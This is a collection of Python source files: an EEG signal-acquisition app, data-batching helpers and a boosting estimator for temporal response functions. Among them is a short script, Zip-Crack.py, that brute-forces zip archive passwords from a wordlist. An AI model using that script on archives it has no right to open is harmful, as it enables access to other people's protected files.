y = sum(self.b * self.xbuf[::-1]) - sum(self.a[1:] * self.ybuf[::-1])
self.xbuf= self.xbuf[1:]
self.ybuf += [y]
self.ybuf = self.ybuf[1:]
return y
def refresh_notch_filter(self,f=50,enable=True):
if enable:
w0 = f/(self.fs/2)
self.bNotch,self.aNotch = signal.iirnotch(w0,1)
else:
self.bNotch = np.array([1])
self.aNotch = np.array([1])
self.xbufNotch= [0 for i in range(len(self.bNotch)-1)]
self.ybufNotch= [0 for i in range(len(self.aNotch)-1)]
def refresh_filter(self,fmin,fmax,ftype='band'):
if ftype == 'highpass':
self.b,self.a = signal.butter(4,[fmin/(self.fs/2)],ftype)
elif ftype == 'None':
self.b = np.array([1])
self.a = np.array([1])
else:
self.b,self.a = signal.butter(4,[fmin /(self.fs/2),fmax /(self.fs/2)],ftype)
self.xbuf= [0 for i in range(len(self.b)-1)]
self.ybuf= [0 for i in range(len(self.a)-1)]
def _read_tcp_thread(self):
while self.tcp == True:
logging.info('Waiting for connection')
tcpCliSock, addr = self.tcpSerSock.accept()
print('Connected from:',addr)
while self.tcp == True:
data = tcpCliSock.recv(4096)
if len(data) != 4096:
break
while self.tcp == True:
data = tcpCliSock.recv(2048)
tmp = self.__readRaw(data)
l = len(tmp)
if l > 0:
self.data += tmp
self.data = self.data[l:]
# Time Domain filter Notch
add = list()
for i in tmp:
add += [self.filt_notch(i)]
self.filteredDataNotch += add
self.filteredDataNotch = self.filteredDataNotch[l:]
# Time Domain filter
l = len(add)
for i in add:
self.filteredData += [self.filt(i)]
self.filteredData = self.filteredData[l:]
if self.save:
self.toSave.extend(list(tmp))
# Close connection
tcpCliSock.close()
def refresh(self,dt):
self.root.current_screen.ids['RealTimePlotting'].refresh()
self.root.current_screen.ids['FFT'].refresh()
def connect(self,device):
self.tcp = True
t = threading.Thread(target=self._read_tcp_thread)
t.start()
self.data = np.zeros(self.storedLen).tolist()
# self.__configure_easybci_thread()
# enable real time time-domain or/and frequency-domain plotting
Clock.schedule_interval(self.refresh,1/self.fps)
Clock.schedule_interval(self.classify, self.interval)
#self.root.ids['RealTimePlotting'].start()
#self.root.ids['FFT'].start()
return True
def disconnect(self):
self.tcp = False
# Stop event
Clock.unschedule(self.refresh)
Clock.unschedule(self.classify)
# Clear Figures
Clock.schedule_once(self.root.current_screen.ids['RealTimePlotting'].clear,1)
Clock.schedule_once(self.root.current_screen.ids['FFT'].clear,1)
self.data = np.zeros(self.storedLen).tolist()
self.filteredData = np.zeros(self.storedLen).tolist()
self.filteredDataNotch = np.zeros(self.storedLen).tolist()
def __rawData2Voltage(self, rawData,protocol,gainCoefficient=12):
""" convert rawData to exact voltage
:rawData: a list of rawData
        :returns: converted voltage tuple in uV
"""
raw = np.array(rawData)
raw = raw[raw!=None]
if protocol == 'EasyBCISingleChannel':
            # 2.42 is the reference voltage of the BCI device, 23 is the sampling resolution
dataVol = 2.42 / 2**23 / gainCoefficient * raw
elif protocol == 'BCISingleChannel':
dataVol = 4.033 / 2**23 / gainCoefficient * raw /2**8
dataVol = dataVol * 1e6 # convert uints to uV
return tuple(dataVol)
def __dataHex2int(self, dataHex):
""" Convert hex data of 4 bytes containing EEG data to int
:dataHex: string of length 4
:returns: int
"""
# 'i' means signed integer, '<' means little-endian
try:
data = struct.unpack('<i', dataHex)[0]
return data
except Exception:
pass
def __readRaw(self,rawData, protocol='BCISingleChannel'):
# Get data remaining in the last run
rawRemained = self.rawRemained
raw = rawRemained + rawData
dataList= []
# Manipulate raw data with given protocol
if protocol == 'EasyBCISingleChannel' or protocol == 'BCISingleChannel':
start = b'\xaa'
middle = b'\xa1'
lastIndex = 0
            # Find candidate start positions by searching the raw data for the start byte
possibleIndex = [i for i in range(len(raw)) if raw[i:i+1] == start ]
rawLen = len(raw)
            # To validate each candidate index, check whether the middle byte complies with the protocol.
for index in possibleIndex :
middleIndex = index + 6
try:
raw[middleIndex]
except Exception as e:
continue
if raw[middleIndex:middleIndex+1] == middle:
# middle byte does comply, so extract the pack
rawDataPack = raw[index:index+12]
try:
rawDataPack[11]
except IndexError:
break
try:
# Python 2
checkCode = sum([ord(data) for data in rawDataPack[0:-1]])%256
except Exception:
# Python 3
checkCode = sum([data for data in rawDataPack[0:-1]])%256
if ord(rawDataPack[11:]) == checkCode:
# All validation steps passed
# convert hex to int
dataHex = rawDataPack[2:6] # first data
dataList.append(self.__dataHex2int(dataHex))
dataHex = rawDataPack[7:11] # second data
dataList.append(self.__dataHex2int(dataHex))
lastIndex = index + 12
                        # Electrode contact detection (top two bits of the status byte)
connectState = (rawDataPack[1] & 0xC0) >> 6
else:
# if index + 12 <= rawLen:
logging.warning('CheckCode: %s Fail with CheckCode %s%s%s' %(rawDataPack.hex(), Fore.RED, hex(checkCode)[2:], Style.RESET_ALL ) )
# Update remaining raw data
self.rawRemained = raw[lastIndex:]
return self.__rawData2Voltage(dataList, protocol = protocol)
else:
            # Unsupported protocol
            raise Exception('protocol should be EasyBCISingleChannel or BCISingleChannel')
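# A minimal, hypothetical sketch (not used by the app) of the 12-byte packet
# framing that __readRaw above assumes: byte 0 = 0xAA start marker, byte 1 =
# status, bytes 2-5 = first sample (little-endian signed int), byte 6 = 0xA1
# middle marker, bytes 7-10 = second sample, byte 11 = checksum (sum of bytes
# 0-10 modulo 256). The helper below only illustrates that validation.
def _validate_bci_packet(pack):
    """Return True if a 12-byte packet matches the framing checked by __readRaw."""
    if len(pack) != 12 or pack[0:1] != b'\xaa' or pack[6:7] != b'\xa1':
        return False
    return sum(pack[0:11]) % 256 == pack[11]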
if __name__ == '__main__':
# logging.basicConfig(level=logging.INFO,
# format='%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s',
# datefmt='%H:%M:%S')
# BlinkApp().run()
app = BCIApp()
try:
app.run()
except KeyboardInterrupt:
app.disconnect()
|
Zip-Crack.py
|
#!/usr/bin/env python3
# Crack Zip Files using wordlists
#Author Yehia Elghaly
import zipfile
import colorama
from colorama import Fore, Back, Style
from threading import Thread
print ("Zip Brute Force Attack")
def zip_crack(zipsec, password):
try:
		password = password.encode('utf-8')
zipsec.extractall(pwd=password)
print (Fore.GREEN + "[*] Password Found: ", str(password))
except:
pass
def Main():
	zipname = input("Name of Zip file: ")
pname = input("Name of Password file: ")
	if not zipname or not pname:
		print (Fore.RED + "Wrong File Name")
exit(0)
else:
pass
zipsec = zipfile.ZipFile(zipname)
passFile = open(pname)
for line in passFile.readlines():
password = line.strip('\n')
thr = Thread(target=zip_crack, args=(zipsec, password))
thr.start()
if __name__ == '__main__':
Main()
|
helper.py
|
#-*- coding: utf-8 -*-
import os
import sys
import time
import warnings
import queue as Queue
import numpy as np
import threading
import collections
def stream_shuffle_generator(generator, batch_size, shuffle_size=20000):
"""
Args:
generator: iterable dataset
batch_size: int
shuffle_size: int
"""
buffer_list = []
batch_data = []
for examples in generator():
if not isinstance(examples, list):
examples = [examples]
for data in examples:
if len(buffer_list) < shuffle_size:
buffer_list.append(data)
else:
idx = np.random.randint(0, len(buffer_list))
batch_data.append(buffer_list[idx])
buffer_list[idx] = data
if len(batch_data) >= batch_size:
yield batch_data
batch_data = []
if len(batch_data) > 0:
yield batch_data
if len(buffer_list) > 0:
np.random.shuffle(buffer_list)
start = 0
while True:
batch_data = buffer_list[start:(start + batch_size)]
start += batch_size
if len(batch_data) > 0:
yield batch_data
else:
break
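# A small, hypothetical usage sketch (not part of the original module): wrap any
# no-argument generator function and iterate over locally shuffled batches. The
# toy source and sizes below are illustrative only.
def _demo_stream_shuffle():
    def toy_source():
        for i in range(10):
            yield i
    # With a buffer of 4 items, examples are yielded in a locally shuffled order.
    for batch in stream_shuffle_generator(toy_source, batch_size=3, shuffle_size=4):
        print(batch)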
class AsynchronousGenerator:
def __init__(self, generator, start=True, maxsize=0):
self.generator = generator
self.thread = threading.Thread(target=self._generatorcall)
self.q = Queue.Queue(maxsize=maxsize)
self.next = self.__next__
if start:
self.thread.start()
def __next__(self):
done, item = self.q.get()
if done:
raise StopIteration
else:
return item
def __iter__(self):
return self
def __call__(self):
return self.__iter__()
def _generatorcall(self):
for output in self.generator():
self.q.put((False, output))
self.q.put((True, None))
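# Hypothetical usage sketch (not part of the original module): prefetch items from
# a slow generator on a background thread and consume them lazily on the caller's
# thread. The toy source is illustrative only.
def _demo_asynchronous_generator():
    def slow_source():
        for i in range(5):
            time.sleep(0.01)  # simulate I/O latency
            yield i
    async_gen = AsynchronousGenerator(slow_source, maxsize=2)
    for item in async_gen:
        print(item)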
|
_boosting.py
|
"""
Boosting as described by David et al. (2007).
Versions
--------
7: Accept segmented data, respect segmentation (don't concatenate data)
Profiling
---------
ds = datasets._get_continuous()
y = ds['y']
x1 = ds['x1']
x2 = ds['x2']
%prun -s cumulative res = boosting(y, x1, 0, 1)
"""
import inspect
from itertools import product
from multiprocessing import Process, Queue
from multiprocessing.sharedctypes import RawArray
import os
import time
from threading import Event, Thread
import numpy as np
from numpy import newaxis
from scipy.linalg import norm
import scipy.signal
from scipy.stats import spearmanr
from tqdm import tqdm
from .._config import CONFIG
from .._data_obj import NDVar
from .._exceptions import OldVersionError
from .._utils import LazyProperty, user_activity
from ._boosting_opt import l1, l2, generate_options, update_error
from .shared import RevCorrData
# BoostingResult version
VERSION = 10 # file format (assigned in __getstate__, not __init__)
# process messages
JOB_TERMINATE = -1
# error functions
ERROR_FUNC = {'l2': l2, 'l1': l1}
DELTA_ERROR_FUNC = {'l2': 2, 'l1': 1}
class BoostingResult:
"""Result from boosting a temporal response function
Attributes
----------
h : NDVar | tuple of NDVar
The temporal response function. Whether ``h`` is an NDVar or a tuple of
NDVars depends on whether the ``x`` parameter to :func:`boosting` was
an NDVar or a sequence of NDVars.
h_scaled : NDVar | tuple of NDVar
``h`` scaled such that it applies to the original input ``y`` and ``x``.
If boosting was done with ``scale_data=False``, ``h_scaled`` is the same
as ``h``.
h_source : NDVar | tuple of NDVar
If ``h`` was constructed using a basis, ``h_source`` represents the
source of ``h`` before being convolved with the basis.
h_time : UTS
Time dimension of the kernel.
r : float | NDVar
Correlation between the measured response and the response predicted
with ``h``. Type depends on the ``y`` parameter to :func:`boosting`. For
vector data, measured and predicted responses are normalized, and ``r``
is computed as the average dot product over time.
spearmanr : float | NDVar
As ``r``, the Spearman rank correlation.
t_run : float
Time it took to run the boosting algorithm (in seconds).
error : str
The error evaluation method used.
residual : float | NDVar
The residual of the final result
- ``error='l1'``: the sum of the absolute differences between ``y`` and
``h * x``.
- ``error='l2'``: the sum of the squared differences between ``y`` and
``h * x``.
For vector ``y``, the error is defined based on the distance in space
for each data point.
delta : scalar
Kernel modification step used.
mindelta : None | scalar
Mindelta parameter used.
n_samples : int
Number of samples in the input data time axis.
scale_data : bool
Scale_data parameter used.
y_mean : NDVar | scalar
Mean that was subtracted from ``y``.
y_scale : NDVar | scalar
Scale by which ``y`` was divided.
x_mean : NDVar | scalar | tuple
Mean that was subtracted from ``x``.
x_scale : NDVar | scalar | tuple
Scale by which ``x`` was divided.
partitions : int
Numbers of partitions of the data used for cross validation.
"""
def __init__(
self,
# input parameters
y, x, tstart, tstop, scale_data, delta, mindelta, error,
basis, basis_window, partitions_arg, partitions, model, prefit,
# result parameters
h, r, isnan, spearmanr, residual, t_run,
y_mean, y_scale, x_mean, x_scale, y_info={}, r_l1=None,
# new parameters
selective_stopping=0, n_samples=None,
**debug_attrs,
):
# input parameters
self.y = y
self.x = x
self.n_samples = n_samples
self.tstart = tstart
self.tstop = tstop
self.scale_data = scale_data
self.delta = delta
self.mindelta = mindelta
self.error = error
self._partitions_arg = partitions_arg
self.partitions = partitions
self.model = model
self.prefit = prefit
self.basis = basis
self.basis_window = basis_window
self.selective_stopping = selective_stopping
# results
self._h = h
self._y_info = y_info
self.r = r
self.r_l1 = r_l1
self._isnan = isnan
self.spearmanr = spearmanr
self.residual = residual
self.t_run = t_run
self.y_mean = y_mean
self.y_scale = y_scale
self.x_mean = x_mean
self.x_scale = x_scale
self._debug_attrs = debug_attrs
for k, v in debug_attrs.items():
setattr(self, k, v)
def __getstate__(self):
return {
# input parameters
'y': self.y, 'x': self.x, 'tstart': self.tstart, 'tstop': self.tstop,
'scale_data': self.scale_data, 'delta': self.delta,
'mindelta': self.mindelta, 'error': self.error,
'partitions_arg': self._partitions_arg, 'partitions': self.partitions,
'model': self.model, 'prefit': self.prefit, 'basis': self.basis,
'basis_window': self.basis_window,
'selective_stopping': self.selective_stopping,
# results
'h': self._h, 'r': self.r, 'r_l1': self.r_l1, 'isnan': self._isnan,
'spearmanr': self.spearmanr, 'residual': self.residual,
't_run': self.t_run, 'version': VERSION,
'y_mean': self.y_mean, 'y_scale': self.y_scale,
'x_mean': self.x_mean, 'x_scale': self.x_scale,
'y_info': self._y_info, 'n_samples': self.n_samples,
**self._debug_attrs,
}
def __setstate__(self, state):
if state['version'] < 7:
state.update(partitions=None, partitions_arg=None, model=None, basis=0, basis_window='hamming')
elif state['version'] < 8:
state['partitions'] = state.pop('n_partitions')
state['partitions_arg'] = state.pop('n_partitions_arg')
if state['version'] < 9:
state['residual'] = state.pop('fit_error')
if state['version'] < 10:
state['prefit'] = None
self.__init__(**state)
def __repr__(self):
if self.x is None or isinstance(self.x, str):
x = self.x
else:
x = ' + '.join(map(str, self.x))
items = [
'boosting %s ~ %s' % (self.y, x),
'%g - %g' % (self.tstart, self.tstop),
]
for name, param in inspect.signature(boosting).parameters.items():
if param.default is inspect.Signature.empty or name == 'ds':
continue
elif name == 'debug':
continue
elif name == 'partitions':
value = self._partitions_arg
else:
value = getattr(self, name)
if value != param.default:
items.append(f'{name}={value}')
return f"<{', '.join(items)}>"
@LazyProperty
def h(self):
if not self.basis:
return self._h
elif isinstance(self._h, tuple):
return tuple(h.smooth('time', self.basis, self.basis_window, 'full') for h in self._h)
else:
return self._h.smooth('time', self.basis, self.basis_window, 'full')
@LazyProperty
def h_scaled(self):
if self.y_scale is None:
return self.h
elif isinstance(self.h, NDVar):
out = self.h * (self.y_scale / self.x_scale)
out.info = self._y_info.copy()
return out
else:
out = []
for h, sx in zip(self.h, self.x_scale):
h = h * (self.y_scale / sx)
h.info = self._y_info.copy()
out.append(h)
return tuple(out)
@LazyProperty
def h_source(self):
return self._h
@LazyProperty
def h_time(self):
if isinstance(self.h, NDVar):
return self.h.time
else:
return self.h[0].time
@LazyProperty
def _variability(self):
# variability in the data
if self.y_scale is None:
raise NotImplementedError("Not implemented for scale_data=False")
elif self.n_samples is None:
raise OldVersionError("This is an older result object which did not store some necessary information; refit the model to use this attribute")
else:
# Due to the normalization:
return self.n_samples
@LazyProperty
def proportion_explained(self):
return 1 - (self.residual / self._variability)
def _set_parc(self, parc):
"""Change the parcellation of source-space result
Notes
-----
No warning for missing sources!
"""
from .._ndvar import set_parc
if not self.r.has_dim('source'):
raise RuntimeError('BoostingResult does not have source-space data')
def sub_func(obj):
if obj is None:
return None
elif isinstance(obj, tuple):
return tuple(sub_func(obj_) for obj_ in obj)
obj_new = set_parc(obj, parc)
index = np.invert(obj_new.source.parc.startswith('unknown-'))
return obj_new.sub(source=index)
for attr in ('h', 'r', 'spearmanr', 'residual', 'y_mean', 'y_scale'):
setattr(self, attr, sub_func(getattr(self, attr)))
@user_activity
def boosting(y, x, tstart, tstop, scale_data=True, delta=0.005, mindelta=None,
error='l2', basis=0, basis_window='hamming',
partitions=None, model=None, ds=None, selective_stopping=0,
prefit=None, debug=False):
"""Estimate a linear filter with coordinate descent
Parameters
----------
y : NDVar
Signal to predict.
x : NDVar | sequence of NDVar
Signal to use to predict ``y``. Can be sequence of NDVars to include
multiple predictors. Time dimension must correspond to ``y``.
tstart : float
Start of the TRF in seconds.
tstop : float
Stop of the TRF in seconds.
scale_data : bool | 'inplace'
Scale ``y`` and ``x`` before boosting: subtract the mean and divide by
the standard deviation (when ``error='l2'``) or the mean absolute
value (when ``error='l1'``). Use ``'inplace'`` to save memory by scaling
the original objects specified as ``y`` and ``x`` instead of making a
copy.
delta : scalar
Step for changes in the kernel.
mindelta : scalar
If the error for the training data can't be reduced, divide ``delta``
in half until ``delta < mindelta``. The default is ``mindelta = delta``,
i.e. ``delta`` is constant.
error : 'l2' | 'l1'
Error function to use (default is ``l2``).
- ``error='l1'``: the sum of the absolute differences between ``y`` and
``h * x``.
- ``error='l2'``: the sum of the squared differences between ``y`` and
``h * x``.
For vector ``y``, the error is defined based on the distance in space
for each data point.
basis : float
Use a basis of windows with this length for the kernel (by default,
impulses are used).
basis_window : str | float | tuple
Basis window (see :func:`scipy.signal.get_window` for options; default
is ``'hamming'``).
partitions : int
Divide the data into this many ``partitions`` for cross-validation-based
early stopping. In each partition, ``n - 1`` segments are used for
training, and the remaining segment is used for validation.
If data is continuous, data are divided into contiguous segments of
equal length (default 10).
If data has cases, cases are divided with ``[::partitions]`` slices
(default ``min(n_cases, 10)``; if ``model`` is specified, ``n_cases``
is the lowest number of cases in any cell of the model).
model : Categorial
If data has cases, divide cases into different categories (division
for crossvalidation is done separately for each cell).
ds : Dataset
If provided, other parameters can be specified as string for items in
``ds``.
selective_stopping : int
By default, the boosting algorithm stops when the testing error stops
decreasing. With ``selective_stopping=True``, boosting continues but
excludes the predictor (one time-series in ``x``) that caused the
increase in testing error, and continues until all predictors are
stopped. The integer value of ``selective_stopping`` determines after
how many steps with error increases each predictor is excluded.
prefit : BoostingResult
Apply predictions from these estimated response functions before fitting
the remaining predictors. This requires that ``x`` contains all the
predictors that were used to fit ``prefit``, and that they be identical
to the originally used ``x``.
debug : bool
Store additional properties in the result object (increases memory
consumption).
Returns
-------
result : BoostingResult
Results (see :class:`BoostingResult`).
Notes
-----
In order to predict data, use the :func:`convolve` function::
>>> ds = datasets.get_uts()
>>> ds['a1'] = epoch_impulse_predictor('uts', 'A=="a1"', ds=ds)
>>> ds['a0'] = epoch_impulse_predictor('uts', 'A=="a0"', ds=ds)
>>> res = boosting('uts', ['a0', 'a1'], 0, 0.5, partitions=10, model='A', ds=ds)
>>> y_pred = convolve(res.h_scaled, ['a0', 'a1'], ds=ds)
The boosting algorithm is described in [1]_.
References
----------
.. [1] David, S. V., Mesgarani, N., & Shamma, S. A. (2007). Estimating
sparse spectro-temporal receptive fields with natural stimuli. Network:
Computation in Neural Systems, 18(3), 191-212.
`10.1080/09548980701609235 <https://doi.org/10.1080/09548980701609235>`_.
"""
# check arguments
mindelta_ = delta if mindelta is None else mindelta
selective_stopping = int(selective_stopping)
if selective_stopping < 0:
raise ValueError(f"selective_stopping={selective_stopping}")
elif not isinstance(debug, bool):
raise TypeError(f"debug={debug!r}")
data = RevCorrData(y, x, error, scale_data, ds)
data.apply_basis(basis, basis_window)
data.prefit(prefit)
data.initialize_cross_validation(partitions, model, ds)
n_y = len(data.y)
n_x = len(data.x)
# TRF extent in indices
tstep = data.time.tstep
i_start = int(round(tstart / tstep))
i_stop = int(round(tstop / tstep))
trf_length = i_stop - i_start
if data.segments is None:
i_skip = trf_length - 1
else:
i_skip = 0
# progress bar
n_cv = len(data.cv_segments)
pbar = tqdm(desc=f"Boosting{f' {n_y} signals' if n_y > 1 else ''}", total=n_y * n_cv, disable=CONFIG['tqdm'])
t_start = time.time()
# result containers
res = np.empty((3, n_y)) # r, rank-r, error
h_x = np.empty((n_y, n_x, trf_length))
store_y_pred = bool(data.vector_dim) or debug
y_pred = np.empty_like(data.y) if store_y_pred else np.empty(data.y.shape[1:])
# boosting
if CONFIG['n_workers']:
# Make sure cross-validations are added in the same order, otherwise
# slight numerical differences can occur
job_queue, result_queue = setup_workers(data, i_start, trf_length, delta, mindelta_, error, selective_stopping)
stop_jobs = Event()
thread = Thread(target=put_jobs, args=(job_queue, n_y, n_cv, stop_jobs))
thread.start()
# collect results
try:
h_segs = {}
for _ in range(n_y * n_cv):
y_i, seg_i, h = result_queue.get()
pbar.update()
if y_i in h_segs:
h_seg = h_segs[y_i]
h_seg[seg_i] = h
if len(h_seg) == n_cv:
del h_segs[y_i]
hs = [h for h in (h_seg[i] for i in range(n_cv)) if h is not None]
if hs:
h = np.mean(hs, 0, out=h_x[y_i])
y_i_pred = y_pred[y_i] if store_y_pred else y_pred
convolve(h, data.x, data.x_pads, i_start, data.segments, y_i_pred)
if not data.vector_dim:
res[:, y_i] = evaluate_kernel(data.y[y_i], y_i_pred, error, i_skip, data.segments)
else:
h_x[y_i] = 0
if not data.vector_dim:
res[:, y_i] = 0
if store_y_pred:
y_pred[y_i] = 0
else:
h_segs[y_i] = {seg_i: h}
except KeyboardInterrupt:
stop_jobs.set()
raise
else:
for y_i, y_ in enumerate(data.y):
hs = []
for segments, train, test in data.cv_segments:
h = boost(y_, data.x, data.x_pads, segments, train, test, i_start, trf_length, delta, mindelta_, error, selective_stopping)
if h is not None:
hs.append(h)
pbar.update()
if hs:
h = np.mean(hs, 0, out=h_x[y_i])
y_i_pred = y_pred[y_i] if store_y_pred else y_pred
convolve(h, data.x, data.x_pads, i_start, data.segments, y_i_pred)
if not data.vector_dim:
res[:, y_i] = evaluate_kernel(data.y[y_i], y_i_pred, error, i_skip, data.segments)
else:
h_x[y_i] = 0
if not data.vector_dim:
res[:, y_i] = 0
if store_y_pred:
y_pred[y_i] = 0
pbar.close()
t_run = time.time() - t_start
# fit-evaluation statistics
if data.vector_dim:
y_vector = data.y.reshape(data.vector_shape)
y_pred_vector = y_pred.reshape(data.vector_shape)
# error: distance between actual and modeled
y_pred_error = norm(y_vector - y_pred_vector, axis=1)
if error == 'l1':
errs = y_pred_error.mean(-1)
elif error == 'l2':
errs = y_pred_error.std(-1)
else:
raise RuntimeError(f"error={error!r}")
rs, rs_l1 = data.vector_correlation(y_vector, y_pred_vector)
if rs_l1 is None:
r_l1 = None
else:
r_l1 = data.package_value(rs_l1, 'l1 correlation', meas='r')
spearmanr = None
else:
rs, rrs, errs = res
r_l1 = None
spearmanr = data.package_value(rrs, 'rank correlation', meas='r')
isnan = np.isnan(rs)
rs[isnan] = 0
r = data.package_value(rs, 'correlation', meas='r')
residual = data.package_value(errs, 'fit error')
y_mean, y_scale, x_mean, x_scale = data.data_scale_ndvars()
if debug:
debug_attrs = {
'y_pred': data.package_y_like(y_pred, 'y-pred'),
}
else:
debug_attrs = {}
h = data.package_kernel(h_x, tstart)
model_repr = None if model is None else data.model
prefit_repr = None if prefit is None else repr(prefit)
return BoostingResult(
# input parameters
data.y_name, data.x_name, tstart, tstop, scale_data, delta, mindelta, error,
basis, basis_window, partitions, data.partitions, model_repr, prefit_repr,
# result parameters
h, r, isnan, spearmanr, residual, t_run,
y_mean, y_scale, x_mean, x_scale, data.y_info,
# vector results
r_l1, selective_stopping, data.y.shape[1],
**debug_attrs)
class BoostingStep:
__slots__ = ('i_stim', 'i_time', 'delta', 'e_train', 'e_test')
def __init__(self, i_stim, i_time, delta_signed, e_test, e_train):
self.i_stim = i_stim
self.i_time = i_time
self.delta = delta_signed
self.e_train = e_train
self.e_test = e_test
def boost(y, x, x_pads, all_index, train_index, test_index, i_start, trf_length,
delta, mindelta, error, selective_stopping=0, return_history=False):
"""Estimate one filter with boosting
Parameters
----------
y : array (n_times,)
Dependent signal, time series to predict.
x : array (n_stims, n_times)
Stimulus.
x_pads : array (n_stims,)
Padding for x.
train_index : array of (start, stop)
Time sample index of training segments.
test_index : array of (start, stop)
Time sample index of test segments.
trf_length : int
Length of the TRF (in time samples).
delta : scalar
Step of the adjustment.
mindelta : scalar
Smallest delta to use. If no improvement can be found in an iteration,
the first step is to divide delta in half, but stop if delta becomes
smaller than ``mindelta``.
error : str
Error function to use.
selective_stopping : int
Selective stopping.
return_history : bool
Return error history as second return value.
Returns
-------
history[best_iter] : None | array
Winning kernel, or None if 0 is the best kernel.
test_sse_history : list (only if ``return_history==True``)
SSE for test data at each iteration.
"""
delta_error_func = DELTA_ERROR_FUNC[error]
error = ERROR_FUNC[error]
n_stims, n_times = x.shape
assert y.shape == (n_times,)
h = np.zeros((n_stims, trf_length))
# buffers
y_error = y.copy()
new_error = np.empty(h.shape)
new_sign = np.empty(h.shape, np.int8)
x_active = np.ones(n_stims, dtype=np.int8)
# history
best_test_error = np.inf
history = []
i_stim = i_time = delta_signed = None
best_iteration = 0
# pre-assign iterators
for i_boost in range(999999):
# evaluate current h
e_test = error(y_error, test_index)
e_train = error(y_error, train_index)
step = BoostingStep(i_stim, i_time, delta_signed, e_test, e_train)
history.append(step)
# evaluate stopping conditions
if e_test < best_test_error:
best_test_error = e_test
best_iteration = i_boost
elif i_boost >= 2 and e_test > history[-2].e_test:
if selective_stopping:
if selective_stopping > 1:
n_bad = selective_stopping - 1
# only stop if the predictor overfits twice without intermittent improvement
undo = 0
for i in range(-2, -len(history), -1):
step = history[i]
if step.e_test > e_test:
break # the error improved
elif step.i_stim == i_stim:
if step.e_test > history[i - 1].e_test:
# the same stimulus caused an error increase
if n_bad == 1:
undo = i
break
n_bad -= 1
else:
break
else:
undo = -1
if undo:
# revert changes
for i in range(-undo):
step = history.pop(-1)
h[step.i_stim, step.i_time] -= step.delta
update_error(y_error, x[step.i_stim], x_pads[step.i_stim], all_index, -step.delta, step.i_time + i_start)
step = history[-1]
# disable predictor
x_active[i_stim] = False
if not np.any(x_active):
break
new_error[i_stim, :] = np.inf
# Basic
# -----
# stop the iteration if all the following requirements are met
# 1. more than 10 iterations are done
# 2. The testing error in the latest iteration is higher than that in
# the previous two iterations
elif i_boost > 10 and e_test > history[-3].e_test:
# print("error(test) not improving in 2 steps")
break
# generate possible movements -> training error
generate_options(y_error, x, x_pads, x_active, train_index, i_start, delta_error_func, delta, new_error, new_sign)
i_stim, i_time = np.unravel_index(np.argmin(new_error), h.shape)
new_train_error = new_error[i_stim, i_time]
delta_signed = new_sign[i_stim, i_time] * delta
# If no improvements can be found reduce delta
if new_train_error > step.e_train:
delta *= 0.5
if delta >= mindelta:
i_stim = i_time = delta_signed = None
# print("new delta: %s" % delta)
continue
else:
# print("No improvement possible for training data")
break
# abort if we're moving in circles
if step.delta and i_stim == step.i_stim and i_time == step.i_time and delta_signed == -step.delta:
break
# update h with best movement
h[i_stim, i_time] += delta_signed
update_error(y_error, x[i_stim], x_pads[i_stim], all_index, delta_signed, i_time + i_start)
else:
raise RuntimeError("Maximum number of iterations exceeded")
# print(' (%i iterations)' % (i_boost + 1))
# reverse changes after best iteration
if best_iteration:
for step in history[-1: best_iteration: -1]:
if step.delta:
h[step.i_stim, step.i_time] -= step.delta
else:
h = None
if return_history:
return h, [step.e_test for step in history]
else:
return h
def setup_workers(data, i_start, trf_length, delta, mindelta, error, selective_stopping):
n_y, n_times = data.y.shape
n_x, _ = data.x.shape
y_buffer = RawArray('d', n_y * n_times)
y_buffer[:] = data.y.ravel()
x_buffer = RawArray('d', n_x * n_times)
x_buffer[:] = data.x.ravel()
x_pads_buffer = RawArray('d', n_x)
x_pads_buffer[:] = data.x_pads
job_queue = Queue(200)
result_queue = Queue(200)
args = (y_buffer, x_buffer, x_pads_buffer, n_y, n_times, n_x, data.cv_segments, i_start, trf_length, delta, mindelta, error, selective_stopping, job_queue, result_queue)
for _ in range(CONFIG['n_workers']):
process = Process(target=boosting_worker, args=args)
process.start()
return job_queue, result_queue
def boosting_worker(y_buffer, x_buffer, x_pads_buffer, n_y, n_times, n_x, cv_segments, i_start, trf_length, delta, mindelta, error, selective_stopping, job_queue, result_queue):
if CONFIG['nice']:
os.nice(CONFIG['nice'])
y = np.frombuffer(y_buffer, np.float64, n_y * n_times).reshape((n_y, n_times))
x = np.frombuffer(x_buffer, np.float64, n_x * n_times).reshape((n_x, n_times))
x_pads = np.frombuffer(x_pads_buffer, np.float64, n_x)
while True:
y_i, seg_i = job_queue.get()
if y_i == JOB_TERMINATE:
return
all_index, train_index, test_index = cv_segments[seg_i]
h = boost(y[y_i], x, x_pads, all_index, train_index, test_index, i_start, trf_length, delta, mindelta, error, selective_stopping)
result_queue.put((y_i, seg_i, h))
def put_jobs(queue, n_y, n_segs, stop):
"Feed boosting jobs into a Queue"
for job in product(range(n_y), range(n_segs)):
queue.put(job)
        if stop.is_set():
while not queue.empty():
queue.get()
break
for _ in range(CONFIG['n_workers']):
queue.put((JOB_TERMINATE, None))
def convolve(h, x, x_pads, h_i_start, segments=None, out=None):
"""h * x with time axis matching x
Parameters
----------
h : array, (n_stims, h_n_samples)
H.
x : array, (n_stims, n_samples)
X.
x_pads : array (n_stims,)
Padding for x.
h_i_start : int
Time shift of the first sample of ``h``.
segments : array (n_segments, 2)
Data segments.
out : array
Buffer for predicted ``y``.
"""
n_x, n_times = x.shape
h_n_times = h.shape[1]
if out is None:
out = np.zeros(n_times)
else:
out.fill(0)
if segments is None:
segments = ((0, n_times),)
# determine valid section of convolution (cf. _ndvar.convolve())
h_i_max = h_i_start + h_n_times - 1
out_start = max(0, h_i_start)
out_stop = min(0, h_i_max)
conv_start = max(0, -h_i_start)
conv_stop = -h_i_start
# padding
h_pad = np.sum(h * x_pads[:, newaxis], 0)
    # padding for the start (head) of each segment
pad_head_n_times = max(0, h_n_times + h_i_start)
if pad_head_n_times:
pad_head = np.zeros(pad_head_n_times)
for i in range(min(pad_head_n_times, h_n_times)):
pad_head[:pad_head_n_times - i] += h_pad[- i - 1]
else:
pad_head = None
    # padding for the end (tail) of each segment
pad_tail_n_times = -min(0, h_i_start)
if pad_tail_n_times:
pad_tail = np.zeros(pad_tail_n_times)
for i in range(pad_tail_n_times):
pad_tail[i:] += h_pad[i]
else:
pad_tail = None
for start, stop in segments:
if pad_head is not None:
out[start: start + pad_head_n_times] += pad_head
if pad_tail is not None:
out[stop - pad_tail_n_times: stop] += pad_tail
out_index = slice(start + out_start, stop + out_stop)
y_index = slice(conv_start, stop - start + conv_stop)
for ind in range(n_x):
